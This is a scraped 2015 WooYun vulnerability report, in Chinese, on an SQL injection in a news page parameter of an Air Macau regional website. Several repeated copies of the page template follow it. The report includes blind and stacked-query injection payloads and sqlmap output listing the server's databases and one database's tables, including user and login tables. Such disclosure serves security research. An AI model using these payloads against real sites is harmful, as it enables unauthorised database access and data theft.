澳门航空分站大陆业务SQL注入漏洞（南京站）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154585

漏洞标题：澳门航空分站大陆业务SQL注入漏洞（南京站）（臺灣地區）

漏洞作者： goubuli

提交时间：2015-11-26 08:57

修复时间：2015-12-01 02:51

公开时间：2015-12-01 02:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-26：细节已通知厂商并且等待厂商处理中
2015-12-01：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT
为了保持标题好看。。。。
为了支持wooyun海外版
http://zone.wooyun.org/content/23994

详细说明：

漏洞站点：

http://**.**.**.**:8089/

漏洞地址：

http://**.**.**.**:8089/about/news_articles.asp?id=46
参数id可注入

23个数据库:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=49 AND 3726=3726
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=49;WAITFOR DELAY '0:0:5'--
---
[15:17:06] [INFO] testing Microsoft SQL Server
[15:17:06] [INFO] confirming Microsoft SQL Server
[15:17:06] [INFO] heuristics detected web page charset 'ascii'
[15:17:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[15:17:07] [INFO] fetching current user
[15:17:07] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:17:07] [INFO] retrieved: guestuser
current user:    'guestuser'
[15:18:11] [INFO] fetching current database
[15:18:11] [INFO] retrieved: nkg_Web
current database:    'nkg_Web'
[15:18:58] [INFO] testing if current user is DBA
[15:18:59] [INFO] heuristics detected web page charset 'Big5'
[15:18:59] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[15:18:59] [INFO] fetching database names
[15:18:59] [INFO] fetching number of databases
[15:18:59] [INFO] retrieved: 23
[15:19:17] [INFO] retrieved: cn_web
[15:20:00] [INFO] retrieved: ctu_Web
[15:20:37] [INFO] retrieved: hgh_Web
[15:21:20] [INFO] retrieved: master
[15:22:03] [INFO] retrieved: mo_web
[15:23:03] [INFO] retrieved: model
[15:24:12] [INFO] retrieved: msdb
[15:24:32] [INFO] retrieved: nkg_Web
[15:25:28] [INFO] retrieved: pek_Web
[15:26:19] [INFO] retrieved: pvg_Web
[15:27:07] [INFO] retrieved: ReportServer
[15:28:19] [INFO] retrieved: ReportServerTempDB
[15:30:09] [INFO] retrieved: s_airmacau
[15:31:01] [INFO] retrieved: szx_Web
[15:31:53] [INFO] retrieved: tempdb
[15:32:26] [INFO] retrieved: tpe_web
[15:33:21] [INFO] retrieved: tw_amh
[15:34:09] [INFO] retrieved: tw_web
[15:35:20] [INFO] retrieved: tw_web_event
[15:37:17] [INFO] retrieved: tw_web_internal
[15:39:35] [INFO] retrieved: tw_web_outstation
[15:42:37] [INFO] retrieved: tw_web_telex
[15:44:14] [INFO] retrieved: xmn_Web
available databases [23]:
[*] cn_web
[*] ctu_Web
[*] hgh_Web
[*] master
[*] mo_web
[*] model
[*] msdb
[*] nkg_Web
[*] pek_Web
[*] pvg_Web
[*] ReportServer
[*] ReportServerTempDB
[*] s_airmacau
[*] szx_Web
[*] tempdb
[*] tpe_web
[*] tw_amh
[*] tw_web
[*] tw_web_event
[*] tw_web_internal
[*] tw_web_outstation
[*] tw_web_telex
[*] xmn_Web

数据表23张

Database: nkg_Web
[23 tables]
+--------------------+
| CityName           |
| FileMapping        |
| NXPress            |
| NotesLog           |
| aboutnews          |
| dtproperties       |
| iataagent          |
| iatanewslist       |
| iatapricelist      |
| iatauser           |
| login_user         |
| newbonus           |
| news               |
| newsps_reporter    |
| newsps_user        |
| offers             |
| vinfoOrders        |
| vinfopackage       |
| vinfopackagedetail |
| vinfopackageitems  |
| vinfopackagereg    |
| vinfopackagetmp    |
| vinfouser          |
+--------------------+

未深入

漏洞证明：

已证明

修复方案：

过滤

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-01 02:51

厂商回复：

此漏洞似乎廠商已修補，目前無法驗證

漏洞评价：

评价

2015-11-26 09:44 | 牛小帅 ( 普通白帽子 | Rank:1101 漏洞数:257 | 1.乌云最帅的男人 ...)

这个我不是提交过了吗?@浩天我压根没打包你跟我说我的打包了
2015-11-30 13:31 | Hitcon台湾互联网漏洞报告平台(乌云厂商)

此漏洞似乎廠商已修補，目前無法驗證

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154585

漏洞标题：澳门航空分站大陆业务SQL注入漏洞（南京站）（臺灣地區）

相关厂商：Hitcon台湾互联网漏洞报告平台

漏洞作者： goubuli

提交时间：2015-11-26 08:57

修复时间：2015-12-01 02:51

公开时间：2015-12-01 02:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154585

漏洞标题：澳门航空分站大陆业务SQL注入漏洞（南京站）（臺灣地區）

相关厂商：Hitcon台湾互联网漏洞报告平台

漏洞作者： goubuli

提交时间：2015-11-26 08:57

修复时间：2015-12-01 02:51

公开时间：2015-12-01 02:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154585"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 goubuli@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：